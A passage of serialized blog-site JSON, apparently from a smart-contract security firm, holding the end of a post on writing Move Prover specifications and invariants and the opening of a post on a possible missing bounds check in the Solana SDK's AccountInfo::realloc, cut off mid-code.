}\n",[19341],{"type":24,"tag":145,"props":19342,"children":19343},{"__ignoreMap":7},[19344,19365,19385,19406,19452,19460,19523,19562],{"type":24,"tag":301,"props":19345,"children":19346},{"class":303,"line":304},[19347,19351,19356,19361],{"type":24,"tag":301,"props":19348,"children":19349},{"style":369},[19350],{"type":30,"value":15740},{"type":24,"tag":301,"props":19352,"children":19353},{"style":369},[19354],{"type":30,"value":19355}," schema",{"type":24,"tag":301,"props":19357,"children":19358},{"style":10246},[19359],{"type":30,"value":19360}," MultiplyAbortsIf",{"type":24,"tag":301,"props":19362,"children":19363},{"style":359},[19364],{"type":30,"value":3035},{"type":24,"tag":301,"props":19366,"children":19367},{"class":303,"line":320},[19368,19373,19377,19381],{"type":24,"tag":301,"props":19369,"children":19370},{"style":369},[19371],{"type":30,"value":19372}," val",{"type":24,"tag":301,"props":19374,"children":19375},{"style":385},[19376],{"type":30,"value":1679},{"type":24,"tag":301,"props":19378,"children":19379},{"style":369},[19380],{"type":30,"value":16538},{"type":24,"tag":301,"props":19382,"children":19383},{"style":359},[19384],{"type":30,"value":492},{"type":24,"tag":301,"props":19386,"children":19387},{"class":303,"line":335},[19388,19393,19397,19402],{"type":24,"tag":301,"props":19389,"children":19390},{"style":369},[19391],{"type":30,"value":19392}," multiplier",{"type":24,"tag":301,"props":19394,"children":19395},{"style":385},[19396],{"type":30,"value":1679},{"type":24,"tag":301,"props":19398,"children":19399},{"style":10246},[19400],{"type":30,"value":19401}," FixedPoint32",{"type":24,"tag":301,"props":19403,"children":19404},{"style":359},[19405],{"type":30,"value":492},{"type":24,"tag":301,"props":19407,"children":19408},{"class":303,"line":344},[19409,19414,19419,19423,19428,19432,19437,19442,19447],{"type":24,"tag":301,"props":19410,"children":19411},{"style":369},[19412],{"type":30,"value":19413}," aborts_if",{"type":24,"tag":301,"props":19415,"children":19416},{"style":314},[19417],{"type":30,"value":19418}," spec_multiply_u64",{"type":24,"tag":301,"props":19420,"children":19421},{"style":359},[19422],{"type":30,"value":362},{"type":24,"tag":301,"props":19424,"children":19425},{"style":369},[19426],{"type":30,"value":19427},"val",{"type":24,"tag":301,"props":19429,"children":19430},{"style":359},[19431],{"type":30,"value":377},{"type":24,"tag":301,"props":19433,"children":19434},{"style":369},[19435],{"type":30,"value":19436},"multiplier",{"type":24,"tag":301,"props":19438,"children":19439},{"style":359},[19440],{"type":30,"value":19441},") > MAX_U64 ",{"type":24,"tag":301,"props":19443,"children":19444},{"style":369},[19445],{"type":30,"value":19446},"with",{"type":24,"tag":301,"props":19448,"children":19449},{"style":359},[19450],{"type":30,"value":19451}," EMULTIPLICATION;\n",{"type":24,"tag":301,"props":19453,"children":19454},{"class":303,"line":401},[19455],{"type":24,"tag":301,"props":19456,"children":19457},{"style":359},[19458],{"type":30,"value":19459}," }\n",{"type":24,"tag":301,"props":19461,"children":19462},{"class":303,"line":415},[19463,19467,19471,19475,19479,19483,19487,19491,19495,19499,19503,19507,19511,19515,19519],{"type":24,"tag":301,"props":19464,"children":19465},{"style":369},[19466],{"type":30,"value":15740},{"type":24,"tag":301,"props":19468,"children":19469},{"style":369},[19470],{"type":30,"value":13026},{"type":24,"tag":301,"props":19472,"children":19473},{"style":314},[19474],{"type":30,"value":19418},{"type":24,"tag":301,"props":19476,"children":19477},{"style":359},[19478],{"type":30,"value":362},{"type":24,"tag":301,"props":19480,"children":19481},{"style":369},[19482],{"type":30,"value":19427},{"type":24,"tag":301,"props":19484,"children":19485},{"style":385},[19486],{"type":30,"value":1679},{"type":24,"tag":301,"props":19488,"children":19489},{"style":369},[19490],{"type":30,"value":16538},{"type":24,"tag":301,"props":19492,"children":19493},{"style":359},[19494],{"type":30,"value":377},{"type":24,"tag":301,"props":19496,"children":19497},{"style":369},[19498],{"type":30,"value":19436},{"type":24,"tag":301,"props":19500,"children":19501},{"style":385},[19502],{"type":30,"value":1679},{"type":24,"tag":301,"props":19504,"children":19505},{"style":10246},[19506],{"type":30,"value":19401},{"type":24,"tag":301,"props":19508,"children":19509},{"style":359},[19510],{"type":30,"value":9961},{"type":24,"tag":301,"props":19512,"children":19513},{"style":385},[19514],{"type":30,"value":1679},{"type":24,"tag":301,"props":19516,"children":19517},{"style":369},[19518],{"type":30,"value":16538},{"type":24,"tag":301,"props":19520,"children":19521},{"style":359},[19522],{"type":30,"value":3035},{"type":24,"tag":301,"props":19524,"children":19525},{"class":303,"line":439},[19526,19530,19534,19538,19543,19547,19552,19557],{"type":24,"tag":301,"props":19527,"children":19528},{"style":359},[19529],{"type":30,"value":15523},{"type":24,"tag":301,"props":19531,"children":19532},{"style":369},[19533],{"type":30,"value":19427},{"type":24,"tag":301,"props":19535,"children":19536},{"style":385},[19537],{"type":30,"value":431},{"type":24,"tag":301,"props":19539,"children":19540},{"style":369},[19541],{"type":30,"value":19542}," multiplier",{"type":24,"tag":301,"props":19544,"children":19545},{"style":385},[19546],{"type":30,"value":206},{"type":24,"tag":301,"props":19548,"children":19549},{"style":359},[19550],{"type":30,"value":19551},"value) ",{"type":24,"tag":301,"props":19553,"children":19554},{"style":385},[19555],{"type":30,"value":19556},">>",{"type":24,"tag":301,"props":19558,"children":19559},{"style":466},[19560],{"type":30,"value":19561}," 32\n",{"type":24,"tag":301,"props":19563,"children":19564},{"class":303,"line":447},[19565],{"type":24,"tag":301,"props":19566,"children":19567},{"style":359},[19568],{"type":30,"value":19459},{"type":24,"tag":80,"props":19570,"children":19572},{"id":19571},"access-control-policies",[19573],{"type":30,"value":19574},"Access Control Policies",{"type":24,"tag":32,"props":19576,"children":19577},{},[19578],{"type":30,"value":19579},"Somewhat similar to error conditions, it's often useful to enforce explicit access control policies at the specification level.",{"type":24,"tag":32,"props":19581,"children":19582},{},[19583,19585,19591,19593,19598],{"type":30,"value":19584},"For example, in ",{"type":24,"tag":145,"props":19586,"children":19588},{"className":19587},[],[19589],{"type":30,"value":19590},"std::offer",{"type":30,"value":19592}," we are able to see that the function should abort if and only if there does not exist an offer, ",{"type":24,"tag":5422,"props":19594,"children":19595},{},[19596],{"type":30,"value":19597},"or",{"type":30,"value":19599}," the recipient is now allowed.",{"type":24,"tag":291,"props":19601,"children":19603},{"code":19602,"language":9817,"meta":7,"className":9818,"style":7}," spec redeem {\n /// Aborts if there is no offer under `offer_address` or if the account\n /// cannot redeem the offer.\n /// Ensures that the offered struct under `offer_address` is removed.\n aborts_if !exists\u003COffer\u003COffered>>(offer_address);\n aborts_if !is_allowed_recipient\u003COffered>(offer_address, signer::address_of(account));\n ensures !exists\u003COffer\u003COffered>>(offer_address);\n ensures result == old(global\u003COffer\u003COffered>>(offer_address).offered);\n }\n",[19604],{"type":24,"tag":145,"props":19605,"children":19606},{"__ignoreMap":7},[19607,19624,19632,19640,19648,19695,19753,19796,19862],{"type":24,"tag":301,"props":19608,"children":19609},{"class":303,"line":304},[19610,19615,19620],{"type":24,"tag":301,"props":19611,"children":19612},{"style":369},[19613],{"type":30,"value":19614}," spec",{"type":24,"tag":301,"props":19616,"children":19617},{"style":369},[19618],{"type":30,"value":19619}," redeem",{"type":24,"tag":301,"props":19621,"children":19622},{"style":359},[19623],{"type":30,"value":3035},{"type":24,"tag":301,"props":19625,"children":19626},{"class":303,"line":320},[19627],{"type":24,"tag":301,"props":19628,"children":19629},{"style":1062},[19630],{"type":30,"value":19631}," /// Aborts if there is no offer under `offer_address` or if the account\n",{"type":24,"tag":301,"props":19633,"children":19634},{"class":303,"line":335},[19635],{"type":24,"tag":301,"props":19636,"children":19637},{"style":1062},[19638],{"type":30,"value":19639}," /// cannot redeem the offer.\n",{"type":24,"tag":301,"props":19641,"children":19642},{"class":303,"line":344},[19643],{"type":24,"tag":301,"props":19644,"children":19645},{"style":1062},[19646],{"type":30,"value":19647}," /// Ensures that the offered struct under `offer_address` is removed.\n",{"type":24,"tag":301,"props":19649,"children":19650},{"class":303,"line":401},[19651,19655,19660,19664,19668,19673,19677,19682,19686,19691],{"type":24,"tag":301,"props":19652,"children":19653},{"style":369},[19654],{"type":30,"value":15864},{"type":24,"tag":301,"props":19656,"children":19657},{"style":385},[19658],{"type":30,"value":19659}," !",{"type":24,"tag":301,"props":19661,"children":19662},{"style":369},[19663],{"type":30,"value":13523},{"type":24,"tag":301,"props":19665,"children":19666},{"style":359},[19667],{"type":30,"value":1849},{"type":24,"tag":301,"props":19669,"children":19670},{"style":10246},[19671],{"type":30,"value":19672},"Offer",{"type":24,"tag":301,"props":19674,"children":19675},{"style":359},[19676],{"type":30,"value":1849},{"type":24,"tag":301,"props":19678,"children":19679},{"style":10246},[19680],{"type":30,"value":19681},"Offered",{"type":24,"tag":301,"props":19683,"children":19684},{"style":359},[19685],{"type":30,"value":13545},{"type":24,"tag":301,"props":19687,"children":19688},{"style":369},[19689],{"type":30,"value":19690},"offer_address",{"type":24,"tag":301,"props":19692,"children":19693},{"style":359},[19694],{"type":30,"value":589},{"type":24,"tag":301,"props":19696,"children":19697},{"class":303,"line":415},[19698,19702,19706,19711,19715,19719,19723,19727,19732,19736,19740,19744,19749],{"type":24,"tag":301,"props":19699,"children":19700},{"style":369},[19701],{"type":30,"value":15864},{"type":24,"tag":301,"props":19703,"children":19704},{"style":385},[19705],{"type":30,"value":19659},{"type":24,"tag":301,"props":19707,"children":19708},{"style":369},[19709],{"type":30,"value":19710},"is_allowed_recipient",{"type":24,"tag":301,"props":19712,"children":19713},{"style":359},[19714],{"type":30,"value":1849},{"type":24,"tag":301,"props":19716,"children":19717},{"style":10246},[19718],{"type":30,"value":19681},{"type":24,"tag":301,"props":19720,"children":19721},{"style":359},[19722],{"type":30,"value":14426},{"type":24,"tag":301,"props":19724,"children":19725},{"style":369},[19726],{"type":30,"value":19690},{"type":24,"tag":301,"props":19728,"children":19729},{"style":359},[19730],{"type":30,"value":19731},", signer",{"type":24,"tag":301,"props":19733,"children":19734},{"style":385},[19735],{"type":30,"value":10308},{"type":24,"tag":301,"props":19737,"children":19738},{"style":314},[19739],{"type":30,"value":14026},{"type":24,"tag":301,"props":19741,"children":19742},{"style":359},[19743],{"type":30,"value":362},{"type":24,"tag":301,"props":19745,"children":19746},{"style":369},[19747],{"type":30,"value":19748},"account",{"type":24,"tag":301,"props":19750,"children":19751},{"style":359},[19752],{"type":30,"value":3416},{"type":24,"tag":301,"props":19754,"children":19755},{"class":303,"line":439},[19756,19760,19764,19768,19772,19776,19780,19784,19788,19792],{"type":24,"tag":301,"props":19757,"children":19758},{"style":369},[19759],{"type":30,"value":15002},{"type":24,"tag":301,"props":19761,"children":19762},{"style":385},[19763],{"type":30,"value":19659},{"type":24,"tag":301,"props":19765,"children":19766},{"style":369},[19767],{"type":30,"value":13523},{"type":24,"tag":301,"props":19769,"children":19770},{"style":359},[19771],{"type":30,"value":1849},{"type":24,"tag":301,"props":19773,"children":19774},{"style":10246},[19775],{"type":30,"value":19672},{"type":24,"tag":301,"props":19777,"children":19778},{"style":359},[19779],{"type":30,"value":1849},{"type":24,"tag":301,"props":19781,"children":19782},{"style":10246},[19783],{"type":30,"value":19681},{"type":24,"tag":301,"props":19785,"children":19786},{"style":359},[19787],{"type":30,"value":13545},{"type":24,"tag":301,"props":19789,"children":19790},{"style":369},[19791],{"type":30,"value":19690},{"type":24,"tag":301,"props":19793,"children":19794},{"style":359},[19795],{"type":30,"value":589},{"type":24,"tag":301,"props":19797,"children":19798},{"class":303,"line":447},[19799,19803,19807,19811,19816,19820,19825,19829,19833,19837,19841,19845,19849,19853,19857],{"type":24,"tag":301,"props":19800,"children":19801},{"style":369},[19802],{"type":30,"value":15002},{"type":24,"tag":301,"props":19804,"children":19805},{"style":369},[19806],{"type":30,"value":15967},{"type":24,"tag":301,"props":19808,"children":19809},{"style":385},[19810],{"type":30,"value":2460},{"type":24,"tag":301,"props":19812,"children":19813},{"style":314},[19814],{"type":30,"value":19815}," old",{"type":24,"tag":301,"props":19817,"children":19818},{"style":359},[19819],{"type":30,"value":362},{"type":24,"tag":301,"props":19821,"children":19822},{"style":369},[19823],{"type":30,"value":19824},"global",{"type":24,"tag":301,"props":19826,"children":19827},{"style":359},[19828],{"type":30,"value":1849},{"type":24,"tag":301,"props":19830,"children":19831},{"style":10246},[19832],{"type":30,"value":19672},{"type":24,"tag":301,"props":19834,"children":19835},{"style":359},[19836],{"type":30,"value":1849},{"type":24,"tag":301,"props":19838,"children":19839},{"style":10246},[19840],{"type":30,"value":19681},{"type":24,"tag":301,"props":19842,"children":19843},{"style":359},[19844],{"type":30,"value":13545},{"type":24,"tag":301,"props":19846,"children":19847},{"style":369},[19848],{"type":30,"value":19690},{"type":24,"tag":301,"props":19850,"children":19851},{"style":359},[19852],{"type":30,"value":9961},{"type":24,"tag":301,"props":19854,"children":19855},{"style":385},[19856],{"type":30,"value":206},{"type":24,"tag":301,"props":19858,"children":19859},{"style":359},[19860],{"type":30,"value":19861},"offered);\n",{"type":24,"tag":301,"props":19863,"children":19864},{"class":303,"line":476},[19865],{"type":24,"tag":301,"props":19866,"children":19867},{"style":359},[19868],{"type":30,"value":501},{"type":24,"tag":32,"props":19870,"children":19871},{},[19872],{"type":30,"value":19873},"These access control specifications make it impossible to accidentally remove security critical access control policies later.",{"type":24,"tag":80,"props":19875,"children":19877},{"id":19876},"complex-mathematical-formulae",[19878],{"type":30,"value":19879},"Complex Mathematical Formulae",{"type":24,"tag":32,"props":19881,"children":19882},{},[19883,19885,19890],{"type":30,"value":19884},"Whether it's a decimal implementation or more complex data structures, it's often useful to verify that the expected output is ",{"type":24,"tag":5422,"props":19886,"children":19887},{},[19888],{"type":30,"value":19889},"always",{"type":30,"value":19891}," the output.",{"type":24,"tag":32,"props":19893,"children":19894},{},[19895],{"type":30,"value":19896},"Proving that your fundamental data structures work exactly as intended will give you much more confidence in the remainder of your codebase.",{"type":24,"tag":32,"props":19898,"children":19899},{},[19900,19902,19909],{"type":30,"value":19901},"For example, in our work with ",{"type":24,"tag":188,"props":19903,"children":19906},{"href":19904,"rel":19905},"https://laminar.markets/",[192],[19907],{"type":30,"value":19908},"Laminar Markets",{"type":30,"value":19910},", we provided recommendations for verifying their internal splay tree implementation against a simpler priority queue data structure.",{"type":24,"tag":80,"props":19912,"children":19914},{"id":19913},"data-invariants",[19915],{"type":30,"value":19916},"Data Invariants",{"type":24,"tag":32,"props":19918,"children":19919},{},[19920,19922,19928,19929,19935,19937,19943,19945,19951],{"type":30,"value":19921},"Formal verification provides the best environment to verify that certain ",{"type":24,"tag":145,"props":19923,"children":19925},{"className":19924},[],[19926],{"type":30,"value":19927},"variables",{"type":30,"value":152},{"type":24,"tag":145,"props":19930,"children":19932},{"className":19931},[],[19933],{"type":30,"value":19934},"resources",{"type":30,"value":19936}," don't exceed the intended boundaries. Let's consider the struct from below. We can ensure that ",{"type":24,"tag":145,"props":19938,"children":19940},{"className":19939},[],[19941],{"type":30,"value":19942},"index",{"type":30,"value":19944}," is never greater than 4 using a ",{"type":24,"tag":145,"props":19946,"children":19948},{"className":19947},[],[19949],{"type":30,"value":19950},"struct invariant",{"type":30,"value":206},{"type":24,"tag":291,"props":19953,"children":19955},{"code":19954,"language":9817,"meta":7,"className":9818,"style":7},"struct Type {\n index: u64\n}\n\nspec Type {\n invariant index \u003C 4;\n}\n",[19956],{"type":24,"tag":145,"props":19957,"children":19958},{"__ignoreMap":7},[19959,19975,19992,19999,20006,20021,20045],{"type":24,"tag":301,"props":19960,"children":19961},{"class":303,"line":304},[19962,19966,19971],{"type":24,"tag":301,"props":19963,"children":19964},{"style":348},[19965],{"type":30,"value":3010},{"type":24,"tag":301,"props":19967,"children":19968},{"style":10246},[19969],{"type":30,"value":19970}," Type",{"type":24,"tag":301,"props":19972,"children":19973},{"style":359},[19974],{"type":30,"value":3035},{"type":24,"tag":301,"props":19976,"children":19977},{"class":303,"line":320},[19978,19983,19987],{"type":24,"tag":301,"props":19979,"children":19980},{"style":369},[19981],{"type":30,"value":19982}," index",{"type":24,"tag":301,"props":19984,"children":19985},{"style":385},[19986],{"type":30,"value":1679},{"type":24,"tag":301,"props":19988,"children":19989},{"style":10246},[19990],{"type":30,"value":19991}," u64\n",{"type":24,"tag":301,"props":19993,"children":19994},{"class":303,"line":335},[19995],{"type":24,"tag":301,"props":19996,"children":19997},{"style":359},[19998],{"type":30,"value":698},{"type":24,"tag":301,"props":20000,"children":20001},{"class":303,"line":344},[20002],{"type":24,"tag":301,"props":20003,"children":20004},{"emptyLinePlaceholder":16},[20005],{"type":30,"value":341},{"type":24,"tag":301,"props":20007,"children":20008},{"class":303,"line":401},[20009,20013,20017],{"type":24,"tag":301,"props":20010,"children":20011},{"style":369},[20012],{"type":30,"value":15090},{"type":24,"tag":301,"props":20014,"children":20015},{"style":10246},[20016],{"type":30,"value":19970},{"type":24,"tag":301,"props":20018,"children":20019},{"style":359},[20020],{"type":30,"value":3035},{"type":24,"tag":301,"props":20022,"children":20023},{"class":303,"line":415},[20024,20028,20033,20037,20041],{"type":24,"tag":301,"props":20025,"children":20026},{"style":369},[20027],{"type":30,"value":15107},{"type":24,"tag":301,"props":20029,"children":20030},{"style":369},[20031],{"type":30,"value":20032}," index",{"type":24,"tag":301,"props":20034,"children":20035},{"style":385},[20036],{"type":30,"value":3950},{"type":24,"tag":301,"props":20038,"children":20039},{"style":466},[20040],{"type":30,"value":1041},{"type":24,"tag":301,"props":20042,"children":20043},{"style":359},[20044],{"type":30,"value":492},{"type":24,"tag":301,"props":20046,"children":20047},{"class":303,"line":439},[20048],{"type":24,"tag":301,"props":20049,"children":20050},{"style":359},[20051],{"type":30,"value":698},{"type":24,"tag":32,"props":20053,"children":20054},{},[20055,20057,20064,20065,20071],{"type":30,"value":20056},"We were able to verify more complex properties in our recent audits for ",{"type":24,"tag":188,"props":20058,"children":20061},{"href":20059,"rel":20060},"https://layerzero.network/",[192],[20062],{"type":30,"value":20063},"LayerZero",{"type":30,"value":2378},{"type":24,"tag":188,"props":20066,"children":20069},{"href":20067,"rel":20068},"http://ariesmarkets.xyz/",[192],[20070],{"type":30,"value":13608},{"type":30,"value":20072},", but the details are left as an exercise to the reader.",{"type":24,"tag":80,"props":20074,"children":20076},{"id":20075},"economic-invariants",[20077],{"type":30,"value":20078},"Economic Invariants.",{"type":24,"tag":32,"props":20080,"children":20081},{},[20082],{"type":30,"value":20083},"Proper economic invariants can require more creativity to come up with but can be extremely effective at securing your protocol.",{"type":24,"tag":32,"props":20085,"children":20086},{},[20087],{"type":30,"value":20088},"For example, you should never be able to drain coins from a pool by adding and removing shares. In practice, you might implement this as a utility helper function.",{"type":24,"tag":291,"props":20090,"children":20091},{"code":14782,"language":9817,"meta":7,"className":9818,"style":7},[20092],{"type":24,"tag":145,"props":20093,"children":20094},{"__ignoreMap":7},[20095,20102,20185,20224,20243,20250,20265,20288,20311,20334],{"type":24,"tag":301,"props":20096,"children":20097},{"class":303,"line":304},[20098],{"type":24,"tag":301,"props":20099,"children":20100},{"style":1062},[20101],{"type":30,"value":14794},{"type":24,"tag":301,"props":20103,"children":20104},{"class":303,"line":320},[20105,20109,20113,20117,20121,20125,20129,20133,20137,20141,20145,20149,20153,20157,20161,20165,20169,20173,20177,20181],{"type":24,"tag":301,"props":20106,"children":20107},{"style":369},[20108],{"type":30,"value":13388},{"type":24,"tag":301,"props":20110,"children":20111},{"style":314},[20112],{"type":30,"value":14806},{"type":24,"tag":301,"props":20114,"children":20115},{"style":359},[20116],{"type":30,"value":362},{"type":24,"tag":301,"props":20118,"children":20119},{"style":369},[20120],{"type":30,"value":14815},{"type":24,"tag":301,"props":20122,"children":20123},{"style":385},[20124],{"type":30,"value":1679},{"type":24,"tag":301,"props":20126,"children":20127},{"style":10246},[20128],{"type":30,"value":12680},{"type":24,"tag":301,"props":20130,"children":20131},{"style":359},[20132],{"type":30,"value":377},{"type":24,"tag":301,"props":20134,"children":20135},{"style":369},[20136],{"type":30,"value":14832},{"type":24,"tag":301,"props":20138,"children":20139},{"style":385},[20140],{"type":30,"value":1679},{"type":24,"tag":301,"props":20142,"children":20143},{"style":10246},[20144],{"type":30,"value":12680},{"type":24,"tag":301,"props":20146,"children":20147},{"style":359},[20148],{"type":30,"value":9961},{"type":24,"tag":301,"props":20150,"children":20151},{"style":385},[20152],{"type":30,"value":1679},{"type":24,"tag":301,"props":20154,"children":20155},{"style":359},[20156],{"type":30,"value":873},{"type":24,"tag":301,"props":20158,"children":20159},{"style":10246},[20160],{"type":30,"value":14857},{"type":24,"tag":301,"props":20162,"children":20163},{"style":359},[20164],{"type":30,"value":377},{"type":24,"tag":301,"props":20166,"children":20167},{"style":10246},[20168],{"type":30,"value":14857},{"type":24,"tag":301,"props":20170,"children":20171},{"style":359},[20172],{"type":30,"value":911},{"type":24,"tag":301,"props":20174,"children":20175},{"style":369},[20176],{"type":30,"value":13163},{"type":24,"tag":301,"props":20178,"children":20179},{"style":10246},[20180],{"type":30,"value":14878},{"type":24,"tag":301,"props":20182,"children":20183},{"style":359},[20184],{"type":30,"value":3035},{"type":24,"tag":301,"props":20186,"children":20187},{"class":303,"line":335},[20188,20192,20196,20200,20204,20208,20212,20216,20220],{"type":24,"tag":301,"props":20189,"children":20190},{"style":348},[20191],{"type":30,"value":14890},{"type":24,"tag":301,"props":20193,"children":20194},{"style":369},[20195],{"type":30,"value":14895},{"type":24,"tag":301,"props":20197,"children":20198},{"style":385},[20199],{"type":30,"value":2537},{"type":24,"tag":301,"props":20201,"children":20202},{"style":314},[20203],{"type":30,"value":14904},{"type":24,"tag":301,"props":20205,"children":20206},{"style":359},[20207],{"type":30,"value":362},{"type":24,"tag":301,"props":20209,"children":20210},{"style":369},[20211],{"type":30,"value":14815},{"type":24,"tag":301,"props":20213,"children":20214},{"style":359},[20215],{"type":30,"value":377},{"type":24,"tag":301,"props":20217,"children":20218},{"style":369},[20219],{"type":30,"value":14832},{"type":24,"tag":301,"props":20221,"children":20222},{"style":359},[20223],{"type":30,"value":589},{"type":24,"tag":301,"props":20225,"children":20226},{"class":303,"line":344},[20227,20231,20235,20239],{"type":24,"tag":301,"props":20228,"children":20229},{"style":314},[20230],{"type":30,"value":14932},{"type":24,"tag":301,"props":20232,"children":20233},{"style":359},[20234],{"type":30,"value":362},{"type":24,"tag":301,"props":20236,"children":20237},{"style":369},[20238],{"type":30,"value":14941},{"type":24,"tag":301,"props":20240,"children":20241},{"style":359},[20242],{"type":30,"value":791},{"type":24,"tag":301,"props":20244,"children":20245},{"class":303,"line":401},[20246],{"type":24,"tag":301,"props":20247,"children":20248},{"style":359},[20249],{"type":30,"value":6918},{"type":24,"tag":301,"props":20251,"children":20252},{"class":303,"line":415},[20253,20257,20261],{"type":24,"tag":301,"props":20254,"children":20255},{"style":369},[20256],{"type":30,"value":14960},{"type":24,"tag":301,"props":20258,"children":20259},{"style":369},[20260],{"type":30,"value":14806},{"type":24,"tag":301,"props":20262,"children":20263},{"style":359},[20264],{"type":30,"value":3035},{"type":24,"tag":301,"props":20266,"children":20267},{"class":303,"line":439},[20268,20272,20276,20280,20284],{"type":24,"tag":301,"props":20269,"children":20270},{"style":369},[20271],{"type":30,"value":14976},{"type":24,"tag":301,"props":20273,"children":20274},{"style":369},[20275],{"type":30,"value":14981},{"type":24,"tag":301,"props":20277,"children":20278},{"style":385},[20279],{"type":30,"value":523},{"type":24,"tag":301,"props":20281,"children":20282},{"style":348},[20283],{"type":30,"value":14990},{"type":24,"tag":301,"props":20285,"children":20286},{"style":359},[20287],{"type":30,"value":492},{"type":24,"tag":301,"props":20289,"children":20290},{"class":303,"line":447},[20291,20295,20299,20303,20307],{"type":24,"tag":301,"props":20292,"children":20293},{"style":369},[20294],{"type":30,"value":15002},{"type":24,"tag":301,"props":20296,"children":20297},{"style":369},[20298],{"type":30,"value":15007},{"type":24,"tag":301,"props":20300,"children":20301},{"style":385},[20302],{"type":30,"value":15012},{"type":24,"tag":301,"props":20304,"children":20305},{"style":369},[20306],{"type":30,"value":15017},{"type":24,"tag":301,"props":20308,"children":20309},{"style":359},[20310],{"type":30,"value":492},{"type":24,"tag":301,"props":20312,"children":20313},{"class":303,"line":476},[20314,20318,20322,20326,20330],{"type":24,"tag":301,"props":20315,"children":20316},{"style":369},[20317],{"type":30,"value":15002},{"type":24,"tag":301,"props":20319,"children":20320},{"style":369},[20321],{"type":30,"value":15033},{"type":24,"tag":301,"props":20323,"children":20324},{"style":385},[20325],{"type":30,"value":15012},{"type":24,"tag":301,"props":20327,"children":20328},{"style":369},[20329],{"type":30,"value":15042},{"type":24,"tag":301,"props":20331,"children":20332},{"style":359},[20333],{"type":30,"value":492},{"type":24,"tag":301,"props":20335,"children":20336},{"class":303,"line":495},[20337],{"type":24,"tag":301,"props":20338,"children":20339},{"style":359},[20340],{"type":30,"value":6918},{"type":24,"tag":32,"props":20342,"children":20343},{},[20344],{"type":30,"value":20345},"Some other ideas include",{"type":24,"tag":6246,"props":20347,"children":20348},{},[20349,20354,20359],{"type":24,"tag":2659,"props":20350,"children":20351},{},[20352],{"type":30,"value":20353},"Swapping through an AMM should never lead to a decrease in one side of the pool without also increasing the other side. In other words, no free money",{"type":24,"tag":2659,"props":20355,"children":20356},{},[20357],{"type":30,"value":20358},"Lending protocols should always be fully collateralized after a series of deposit, borrow, and withdraw instructions.",{"type":24,"tag":2659,"props":20360,"children":20361},{},[20362],{"type":30,"value":20363},"Orderbooks should never lose money after an order is placed and then canceled.",{"type":24,"tag":43,"props":20365,"children":20366},{"id":12133},[20367],{"type":30,"value":12136},{"type":24,"tag":32,"props":20369,"children":20370},{},[20371],{"type":30,"value":20372},"In this post, we've explored how to properly utilize the Move Prover to verify critical invariants about your codebase.",{"type":24,"tag":32,"props":20374,"children":20375},{},[20376],{"type":30,"value":20377},"In our upcoming posts, we will explore how to turn the Move Prover into a weapon for squashing security vulnerabilities by learning how to ask the right questions, so stay tuned!",{"type":24,"tag":32,"props":20379,"children":20380},{},[20381,20383,20388],{"type":30,"value":20382},"We're passionate about formal verification and pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me ",{"type":24,"tag":188,"props":20384,"children":20386},{"href":16048,"rel":20385},[192],[20387],{"type":30,"value":16052},{"type":30,"value":206},{"type":24,"tag":9672,"props":20390,"children":20391},{},[20392],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":20394},[20395,20396,20399,20406],{"id":16112,"depth":320,"text":16115},{"id":16166,"depth":320,"text":16169,"children":20397},[20398],{"id":16415,"depth":335,"text":16411},{"id":19304,"depth":320,"text":19307,"children":20400},[20401,20402,20403,20404,20405],{"id":19320,"depth":335,"text":19323},{"id":19571,"depth":335,"text":19574},{"id":19876,"depth":335,"text":19879},{"id":19913,"depth":335,"text":19916},{"id":20075,"depth":335,"text":20078},{"id":12133,"depth":320,"text":12136},"content:blog:2022-09-16-move-prover.md","blog/2022-09-16-move-prover.md","blog/2022-09-16-move-prover",{"_path":20411,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":20412,"description":20413,"author":20414,"image":20415,"date":20418,"isFeatured":16,"onBlogPage":16,"tags":20419,"body":20420,"_type":9700,"_id":25520,"_source":9702,"_file":25521,"_stem":25522,"_extension":9705},"/blog/2022-12-09-rust-realloc-and-references","Rust, Realloc, and References","Rust is safe.. right? Not if your dependencies are unsafe.. A deep dive into a subtle Solana SDK bug, Rust internals, and how we found it all.","ethan",{"src":20416,"height":20417,"width":15},"/posts/rust-realloc-and-references/title.jpg",512,"2022-12-09",[9718,16076],{"type":21,"children":20421,"toc":25504},[20422,20450,20470,21138,21158,21169,21181,21314,21324,21330,21356,21695,21740,22066,22128,22141,22215,22282,22303,22316,22330,22676,22687,22692,22823,22874,22900,22912,23085,23221,23262,23299,23360,23365,23402,23456,23467,23610,23622,23628,23634,23667,23681,23802,23821,23849,23855,23945,24035,24041,24046,24092,24360,24435,24446,24472,24804,24816,24889,25162,25199,25500],{"type":24,"tag":32,"props":20423,"children":20424},{},[20425,20427,20433,20435,20440,20442,20448],{"type":30,"value":20426},"It all started with an audit of a program that used ",{"type":24,"tag":145,"props":20428,"children":20430},{"className":20429},[],[20431],{"type":30,"value":20432},"realloc",{"type":30,"value":20434}," on an account, without any bounds checks on the new size allowed. It seemed like the developers assumed that if the new size was too large, the ",{"type":24,"tag":145,"props":20436,"children":20438},{"className":20437},[],[20439],{"type":30,"value":20432},{"type":30,"value":20441}," call (from ",{"type":24,"tag":145,"props":20443,"children":20445},{"className":20444},[],[20446],{"type":30,"value":20447},"solana_program",{"type":30,"value":20449},") would error out appropriately.",{"type":24,"tag":32,"props":20451,"children":20452},{},[20453,20455,20461,20462,20469],{"type":30,"value":20454},"But we're not ones to just assume things around here, so let's take a look at how ",{"type":24,"tag":145,"props":20456,"children":20458},{"className":20457},[],[20459],{"type":30,"value":20460},"AccountInfo::realloc",{"type":30,"value":5945},{"type":24,"tag":188,"props":20463,"children":20466},{"href":20464,"rel":20465},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#124-148",[192],[20467],{"type":30,"value":20468},"implemented",{"type":30,"value":1679},{"type":24,"tag":291,"props":20471,"children":20473},{"className":9818,"code":20472,"language":9817,"meta":7,"style":7},"pub fn realloc(&self, new_len: usize, zero_init: bool) -> Result\u003C(), ProgramError> {\n let orig_len = self.data_len();\n\n // realloc\n unsafe {\n // First set new length in the serialized data\n let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n *ptr = new_len as u64;\n\n // Then set the new length in the local slice\n let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n *ptr = new_len as u64;\n }\n\n // zero-init if requested\n if zero_init && new_len > orig_len {\n sol_memset(\n &mut self.try_borrow_mut_data()?[orig_len..],\n 0,\n 